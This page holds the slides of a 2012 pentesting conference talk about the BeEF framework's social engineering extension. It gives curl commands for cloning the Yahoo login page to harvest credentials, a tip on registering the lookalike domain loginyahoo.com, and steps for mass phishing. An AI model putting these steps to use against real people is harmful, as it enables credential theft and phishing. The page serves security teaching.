SlideShare una empresa de Scribd logo

I'm the butcher would you like some BeEF

Michele Orru
Michele Orru

This document describes using the Browser Exploitation Framework (BeEF) to conduct social engineering attacks. It introduces the creators and outlines how BeEF's web cloning and mass mailing extensions can be automated through a RESTful API to conduct phishing campaigns. Demostrations are provided of cloning a webpage to intercept login credentials, creating an HTML email template, and combining the extensions to send cloned phishing links at scale. The summary emphasizes automating social engineering attacks using BeEF's client-side exploitation abilities.

TecnologíaEmpresariales
1 de 33
Descargar para leer sin conexión
I’m the Butcher would you like some BeEF? 7th Sept 2012 - London Michele ‘antisnatchor’ Orru Thomas MacKenzie 1
Who are we Michele Orru The Butcher Thomas MacKenzie The Meat 2
Outline • A Social Engineering real story • BeEF intro • The new BeEF Social Engineering extension • Having fun with the RESTful API 3
Social Engineering • “Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.” - Grandfather of all knowledge (Wikipedia). 4
Our Mission... • Tasked with gathering as many usernames and passwords as possible in a small amount of time • Tried calling and pretending to be person of authority but awareness seemed to be higher 5
So... • We heard great things about S.E.T. • Decided to use that to clone the website (but found some bugs and limitations that almost made it unusable) 6
Mass-Mailer • With the help of a colleague we then created a basic mass-mailer that used personalization, HTML, pictures and had the ability to spoof the domain name (thanks to their SMTP server settings :-) 7
We Won 8
But The IT Admin was like... • DO NOT CLICK ON THAT LINK 9
We then said (sending another email)... • DO CLICK ON THAT LINK 10
AND... WE WON AGAIN! 11
But... • We thought we could do it better and integrate some awesome client-side exploitation whilst we were at it... 12
Meet BeEF • Browser Exploitation Framework • Pioneered by Wade Alcorn in 2005 • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse. • The framework allows the penetration tester to select specific modules (in real- time) to target each browser, and therefore each context. 13
14
15
Meet BeEF • Demo 16
Social Eng. extension • The idea was to have some BeEF functionality that can be called via the RESTful API, in order to automate: • sending phishing emails using templates, • cloning webpages, harvesting credentials • client-side pwnage 17
AND... WE DID IT! 18
Social Eng. extension 19
BeEF web_cloner • Clone a webpage and serve it on BeEF, then automatically: • modify the page to intercept POST requests • add the BeEF hook to it • if the page can be framed, after POST interception load the original page on an overlay iFrame, otherwise redirect to original page 20
BeEF web_cloner • curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https:// login.yahoo.com/config/login_verify2", "mount":"/"}' -X POST http://<BeEF>/api/ seng/clone_page? token=53921d2736116dbd86f8f7f7f10e46f1 • If you register loginyahoo.com, you can specify a mount point of /config/ login_verify2, so the phishing url will be (almost) the same 21
BeEF web_cloner • Demo 22
BeEF mass_mailer • Do your phishing email campaigns • get a sample email from your target (with company footer...) • copy the HTML content in a new BeEF email template • download images so they will be added inline! • add your malicious links/attachments • send the mail to X targets and have fun 23
BeEF mass_mailer • email templates structure 24
BeEF mass_mailer • ‘default’ template HTML mail 25
BeEF mass_mailer • how the ‘default’ template email will look 26
BeEF mass_mailer • curl -H "Content-Type: application/json; charset=UTF-8" -d 'body' -X POST http://<BeEF>/api/ seng/send_mails?token=0fda00ea62a1102f { "template": "default", "subject": "Hi from BeEF", "fromname": "BeEF", "link": "http://www.microsoft.com/", "linktext": "http://beefproject.com", "recipients": [{ "user1@gmail.com": "Michele", "user2@antisnatchor.com": "Antisnatchor" }]} 27
BeEF mass_mailer • Demo 28
Combine everything FTW • Register your phishing domain • Point the A/MX records to a VPS where you have an SMTP server and BeEF • Create a BeEF RESTful API script that: • Clone a webpage link with web_cloner • Send X emails with that link with mass_mailer • Script intelligent attacks thanks to BeEF browser detection 29
Combine everything FTW • Last demo 30
BeEF web_cloner + mass_mailer + RESTful API = 31
Thanks • Wade to be always awesome • The other BeEF guys: Brendan, Christian, Ben, Saafan, Ryan, Heather • A few new project joiners: Bart Leppens, gallypette, Quentin Swain • Tom Neaves for the butcher/hook images :D 32
Questions? 33

Recomendados

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a Phisherman
Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
Michele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyone
Vladimír Smitka
 

Recomendados

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a Phisherman
Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
Michele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyone
Vladimír Smitka
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
Michele Orru
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
jaredhaight
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!
WordCamp Cape Town
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
Krzysztof Kotowicz
 
Improve WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeImprove WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of code
Danilo Ercoli
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
Ryan Cobb
 
Mobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressMobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPress
Danilo Ercoli
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)
Darren Duke
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
jaredhaight
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
jaredhaight
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Jeremy Brown
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
Vladimír Smitka
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best Practices
Danilo Ercoli
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
B wapp – bee bug – installation
B wapp – bee bug – installationB wapp – bee bug – installation
B wapp – bee bug – installation
Ronan Dunne, CEH, SSCP
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
WordPress Server Security
WordPress Server SecurityWordPress Server Security
WordPress Server Security
Peter Baylies
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
Nikhil Mittal
 
Dmk Bo2 K7 Web
Dmk Bo2 K7 WebDmk Bo2 K7 Web
Dmk Bo2 K7 Web
royans
 
Pentesting Android Applications
Pentesting Android ApplicationsPentesting Android Applications
Pentesting Android Applications
Cláudio André
 
Ps3 linux
Ps3 linuxPs3 linux
Ps3 linux
Keith Wright
 

Más contenido relacionado

La actualidad más candente

Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Jeremy Brown
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best Practices
Danilo Ercoli
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 

La actualidad más candente (20)

BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
 
Improve WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeImprove WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of code
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
Mobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressMobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPress
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best Practices
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
B wapp – bee bug – installation
B wapp – bee bug – installationB wapp – bee bug – installation
B wapp – bee bug – installation
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
 
WordPress Server Security
WordPress Server SecurityWordPress Server Security
WordPress Server Security
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
 
Dmk Bo2 K7 Web
Dmk Bo2 K7 WebDmk Bo2 K7 Web
Dmk Bo2 K7 Web
 

Destacado

Stickybits & altoids (12.1.10)
Stickybits & altoids (12.1.10)Stickybits & altoids (12.1.10)
Stickybits & altoids (12.1.10)
Steve Schlafman
 

Destacado (20)

Pentesting Android Applications
Pentesting Android ApplicationsPentesting Android Applications
Pentesting Android Applications
 
Ps3 linux
Ps3 linuxPs3 linux
Ps3 linux
 
Fleet Commander - Flock 2017
Fleet Commander - Flock 2017Fleet Commander - Flock 2017
Fleet Commander - Flock 2017
 
Centos 7 Installation Steps
Centos 7 Installation StepsCentos 7 Installation Steps
Centos 7 Installation Steps
 
DNSTap Webinar
DNSTap WebinarDNSTap Webinar
DNSTap Webinar
 
Stickybits + Altoids Case Study Dec 2010
Stickybits + Altoids Case Study Dec 2010Stickybits + Altoids Case Study Dec 2010
Stickybits + Altoids Case Study Dec 2010
 
Stickybits & altoids (12.1.10)
Stickybits & altoids (12.1.10)Stickybits & altoids (12.1.10)
Stickybits & altoids (12.1.10)
 
Why spending money on ads if you can hack the system?
Why spending money on ads if you can hack the system?Why spending money on ads if you can hack the system?
Why spending money on ads if you can hack the system?
 
Jana: Case Study Presentation
Jana: Case Study PresentationJana: Case Study Presentation
Jana: Case Study Presentation
 
Tools to hack a businessmodel
Tools to hack a businessmodelTools to hack a businessmodel
Tools to hack a businessmodel
 
20 new ways to unlock revenue
20 new ways to unlock revenue20 new ways to unlock revenue
20 new ways to unlock revenue
 
PowerDNS Webinar - Part 2
PowerDNS Webinar - Part 2PowerDNS Webinar - Part 2
PowerDNS Webinar - Part 2
 
Founders' conflict
Founders' conflictFounders' conflict
Founders' conflict
 
Growth Hacking using behavioral economics
Growth Hacking using behavioral economicsGrowth Hacking using behavioral economics
Growth Hacking using behavioral economics
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing Solutions
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?
 
Guerrilla User and Design Research
Guerrilla User and Design ResearchGuerrilla User and Design Research
Guerrilla User and Design Research
 
Rh199 rhel 7
Rh199 rhel 7Rh199 rhel 7
Rh199 rhel 7
 
Raising a Seed Round from Lerer Ventures
Raising a Seed Round from Lerer VenturesRaising a Seed Round from Lerer Ventures
Raising a Seed Round from Lerer Ventures
 
79307422 2-wettability-literature-survey-part-1
79307422 2-wettability-literature-survey-part-179307422 2-wettability-literature-survey-part-1
79307422 2-wettability-literature-survey-part-1
 

Similar a I'm the butcher would you like some BeEF

Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
DefconRussia
 
Beyond Bearer: Token Binding as the Foundation for a More Secure Web
Beyond Bearer: Token Binding as the Foundation for a More Secure WebBeyond Bearer: Token Binding as the Foundation for a More Secure Web
Beyond Bearer: Token Binding as the Foundation for a More Secure Web
Brian Campbell
 
Progressive Enhancement using WSGI
Progressive Enhancement using WSGIProgressive Enhancement using WSGI
Progressive Enhancement using WSGI
Matthew Wilkes
 
Concerto conmoto
Concerto conmotoConcerto conmoto
Concerto conmoto
mskmoorthy
 
eDevelopment.ppt
eDevelopment.ppteDevelopment.ppt
eDevelopment.ppt
BijayKc16
 

Similar a I'm the butcher would you like some BeEF (20)

Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
 
Build Your First EE2 Site
Build Your First EE2 SiteBuild Your First EE2 Site
Build Your First EE2 Site
 
Building Chatbots
Building ChatbotsBuilding Chatbots
Building Chatbots
 
Chatbot Meetup
Chatbot MeetupChatbot Meetup
Chatbot Meetup
 
Continuous Integration with Cloud Foundry Concourse and Docker on OpenPOWER
Continuous Integration with Cloud Foundry Concourse and Docker on OpenPOWERContinuous Integration with Cloud Foundry Concourse and Docker on OpenPOWER
Continuous Integration with Cloud Foundry Concourse and Docker on OpenPOWER
 
Beyond Bearer: Token Binding as the Foundation for a More Secure Web
Beyond Bearer: Token Binding as the Foundation for a More Secure WebBeyond Bearer: Token Binding as the Foundation for a More Secure Web
Beyond Bearer: Token Binding as the Foundation for a More Secure Web
 
Chatbots
ChatbotsChatbots
Chatbots
 
Conversations as a Platform
Conversations as a PlatformConversations as a Platform
Conversations as a Platform
 
MDN Development & Web Documentation
MDN Development & Web DocumentationMDN Development & Web Documentation
MDN Development & Web Documentation
 
Solving Common Client Requets with jQuery Presentation (v2)
Solving Common Client Requets with jQuery Presentation (v2)Solving Common Client Requets with jQuery Presentation (v2)
Solving Common Client Requets with jQuery Presentation (v2)
 
Progressive Enhancement using WSGI
Progressive Enhancement using WSGIProgressive Enhancement using WSGI
Progressive Enhancement using WSGI
 
pentest
pentestpentest
pentest
 
Google App Engine and Social Apps
Google App Engine and Social AppsGoogle App Engine and Social Apps
Google App Engine and Social Apps
 
Concerto conmoto
Concerto conmotoConcerto conmoto
Concerto conmoto
 
Need to reboot your content creation strategy? Start with "No"
Need to reboot your content creation strategy? Start with "No"Need to reboot your content creation strategy? Start with "No"
Need to reboot your content creation strategy? Start with "No"
 
Создание API, которое полюбят разработчики. Глубокое погружение
Создание API, которое полюбят разработчики. Глубокое погружениеСоздание API, которое полюбят разработчики. Глубокое погружение
Создание API, которое полюбят разработчики. Глубокое погружение
 
PHP Unconference Continuous Integration
PHP Unconference Continuous IntegrationPHP Unconference Continuous Integration
PHP Unconference Continuous Integration
 
Serverless chatbot: from idea to production at blazing speed
Serverless chatbot: from idea to production at blazing speedServerless chatbot: from idea to production at blazing speed
Serverless chatbot: from idea to production at blazing speed
 
eDevelopment.ppt
eDevelopment.ppteDevelopment.ppt
eDevelopment.ppt
 
IKS UX sematics contest (finalist presentation)
IKS UX sematics contest (finalist presentation)IKS UX sematics contest (finalist presentation)
IKS UX sematics contest (finalist presentation)
 

Más de Michele Orru

When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012
Michele Orru
 
DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEF
Michele Orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 

Más de Michele Orru (6)

Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012
 
DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEF
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orru
 

Último

Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
panagenda
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Skynet Technologies
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
Srushith Repakula
 

Último (20)

Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 Warsaw
 
Intro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxIntro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptx
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch Tuesday
 
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptx
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptx
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
 
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - Questionnaire
 
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
 
Collecting & Temporal Analysis of Behavioral Web Data - Tales From The Inside
Collecting & Temporal Analysis of Behavioral Web Data - Tales From The InsideCollecting & Temporal Analysis of Behavioral Web Data - Tales From The Inside
Collecting & Temporal Analysis of Behavioral Web Data - Tales From The Inside
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!
 
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdfIntroduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
 
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
 

I'm the butcher would you like some BeEF

  • 1. I’m the Butcher would you like some BeEF? 7th Sept 2012 - London Michele ‘antisnatchor’ Orru Thomas MacKenzie 1
  • 2. Who are we Michele Orru The Butcher Thomas MacKenzie The Meat 2
  • 3. Outline • A Social Engineering real story • BeEF intro • The new BeEF Social Engineering extension • Having fun with the RESTful API 3
  • 4. Social Engineering • “Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.” - Grandfather of all knowledge (Wikipedia). 4
  • 5. Our Mission... • Tasked with gathering as many usernames and passwords as possible in a small amount of time • Tried calling and pretending to be person of authority but awareness seemed to be higher 5
  • 6. So... • We heard great things about S.E.T. • Decided to use that to clone the website (but found some bugs and limitations that almost made it unusable) 6
  • 7. Mass-Mailer • With the help of a colleague we then created a basic mass-mailer that used personalization, HTML, pictures and had the ability to spoof the domain name (thanks to their SMTP server settings :-) 7
  • 8. We Won 8
  • 9. But The IT Admin was like... • DO NOT CLICK ON THAT LINK 9
  • 10. We then said (sending another email)... • DO CLICK ON THAT LINK 10
  • 11. AND... WE WON AGAIN! 11
  • 12. But... • We thought we could do it better and integrate some awesome client-side exploitation whilst we were at it... 12
  • 13. Meet BeEF • Browser Exploitation Framework • Pioneered by Wade Alcorn in 2005 • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse. • The framework allows the penetration tester to select specific modules (in real- time) to target each browser, and therefore each context. 13
  • 14. 14
  • 15. 15
  • 16. Meet BeEF • Demo 16
  • 17. Social Eng. extension • The idea was to have some BeEF functionality that can be called via the RESTful API, in order to automate: • sending phishing emails using templates, • cloning webpages, harvesting credentials • client-side pwnage 17
  • 18. AND... WE DID IT! 18
  • 20. BeEF web_cloner • Clone a webpage and serve it on BeEF, then automatically: • modify the page to intercept POST requests • add the BeEF hook to it • if the page can be framed, after POST interception load the original page on an overlay iFrame, otherwise redirect to original page 20
  • 21. BeEF web_cloner • curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https:// login.yahoo.com/config/login_verify2", "mount":"/"}' -X POST http://<BeEF>/api/ seng/clone_page? token=53921d2736116dbd86f8f7f7f10e46f1 • If you register loginyahoo.com, you can specify a mount point of /config/ login_verify2, so the phishing url will be (almost) the same 21
  • 22. BeEF web_cloner • Demo 22
  • 23. BeEF mass_mailer • Do your phishing email campaigns • get a sample email from your target (with company footer...) • copy the HTML content in a new BeEF email template • download images so they will be added inline! • add your malicious links/attachments • send the mail to X targets and have fun 23
  • 24. BeEF mass_mailer • email templates structure 24
  • 25. BeEF mass_mailer • ‘default’ template HTML mail 25
  • 26. BeEF mass_mailer • how the ‘default’ template email will look 26
